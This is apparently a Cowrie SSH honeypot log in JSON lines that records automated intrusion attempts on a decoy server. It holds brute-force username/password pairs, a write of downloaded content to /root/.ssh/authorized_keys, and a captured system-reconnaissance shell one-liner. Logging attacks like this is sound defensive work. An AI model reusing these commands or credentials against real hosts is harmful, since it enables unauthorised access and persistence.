{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:37:25.672119Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:25.673044Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48096,"dst_ip":"1.2.3.4","dst_port":22,"session":"c80b23bd36c0","protocol":"ssh","message":"New connection: 27.112.78.245:48096 (1.2.3.4:22) [session: c80b23bd36c0]","sensor":"my-vps","timestamp":"2025-08-26T00:37:25.928452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:25.929510Z","src_ip":"27.112.78.245","session":"c80b23bd36c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:26.220092Z","src_ip":"27.112.78.245","session":"c80b23bd36c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:37:27.739484Z","src_ip":"27.112.78.245","session":"c80b23bd36c0"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:29.000467Z","src_ip":"27.112.78.245","session":"c80b23bd36c0"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48112,"dst_ip":"1.2.3.4","dst_port":22,"session":"be183b896797","protocol":"ssh","message":"New connection: 27.112.78.245:48112 (1.2.3.4:22) [session: be183b896797]","sensor":"my-vps","timestamp":"2025-08-26T00:37:29.259202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:29.260270Z","src_ip":"27.112.78.245","session":"be183b896797"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:29.518398Z","src_ip":"27.112.78.245","session":"be183b896797"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:37:30.592637Z","src_ip":"27.112.78.245","session":"be183b896797"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:30.852881Z","src_ip":"27.112.78.245","session":"be183b896797"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:30.854257Z","src_ip":"27.112.78.245","session":"9056c35c06ca"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.101","src_port":53070,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc7a7b0fc543","protocol":"ssh","message":"New connection: 196.251.85.101:53070 (1.2.3.4:22) [session: dc7a7b0fc543]","sensor":"my-vps","timestamp":"2025-08-26T00:37:31.501477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:37:31.803464Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T00:37:31.804112Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.723390Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:37:32.898800Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.899617Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.900527Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.902023Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.903472Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.904457Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.905635Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.907015Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.908459Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.909215Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.909738Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.910347Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T00:37:32.910863Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.003558Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.004568Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.005538Z","src_ip":"196.251.85.101","session":"dc7a7b0fc543"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":50102,"dst_ip":"1.2.3.4","dst_port":22,"session":"b804e08d12cb","protocol":"ssh","message":"New connection: 36.89.28.139:50102 (1.2.3.4:22) [session: b804e08d12cb]","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.659425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.660615Z","src_ip":"36.89.28.139","session":"b804e08d12cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:37:33.842182Z","src_ip":"36.89.28.139","session":"b804e08d12cb"}
{"eventid":"cowrie.login.failed","username":"hassan","password":"hassan123","message":"login attempt [hassan/hassan123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:37:34.606524Z","src_ip":"36.89.28.139","session":"b804e08d12cb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:37:36.268575Z","src_ip":"36.89.28.139","session":"b804e08d12cb"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43166,"dst_ip":"1.2.3.4","dst_port":22,"session":"6418328ab55c","protocol":"ssh","message":"New connection: 24.108.102.132:43166 (1.2.3.4:22) [session: 6418328ab55c]","sensor":"my-vps","timestamp":"2025-08-26T00:38:19.441813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:19.447089Z","src_ip":"24.108.102.132","session":"6418328ab55c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:19.625764Z","src_ip":"24.108.102.132","session":"6418328ab55c"}
{"eventid":"cowrie.login.failed","username":"sdtdserver","password":"sdtdserver","message":"login attempt [sdtdserver/sdtdserver] failed","sensor":"my-vps","timestamp":"2025-08-26T00:38:20.670835Z","src_ip":"24.108.102.132","session":"6418328ab55c"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":58502,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dfa41d14301","protocol":"ssh","message":"New connection: 45.159.112.103:58502 (1.2.3.4:22) [session: 8dfa41d14301]","sensor":"my-vps","timestamp":"2025-08-26T00:38:21.229120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:38:21.230343Z","src_ip":"45.159.112.103","session":"8dfa41d14301"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:38:21.340075Z","src_ip":"45.159.112.103","session":"8dfa41d14301"}
{"eventid":"cowrie.login.failed","username":"test4","password":"test4","message":"login attempt [test4/test4] failed","sensor":"my-vps","timestamp":"2025-08-26T00:38:21.821009Z","src_ip":"45.159.112.103","session":"8dfa41d14301"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:21.847600Z","src_ip":"24.108.102.132","session":"6418328ab55c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:38:22.933029Z","src_ip":"45.159.112.103","session":"8dfa41d14301"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.101","src_port":33720,"dst_ip":"1.2.3.4","dst_port":22,"session":"47e5a9e64d79","protocol":"ssh","message":"New connection: 196.251.85.101:33720 (1.2.3.4:22) [session: 47e5a9e64d79]","sensor":"my-vps","timestamp":"2025-08-26T00:38:31.245668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:38:31.710435Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T00:38:31.711211Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:38:32.593562Z","src_ip":"196.251.85.101","session":"47e5a9e64d79"}
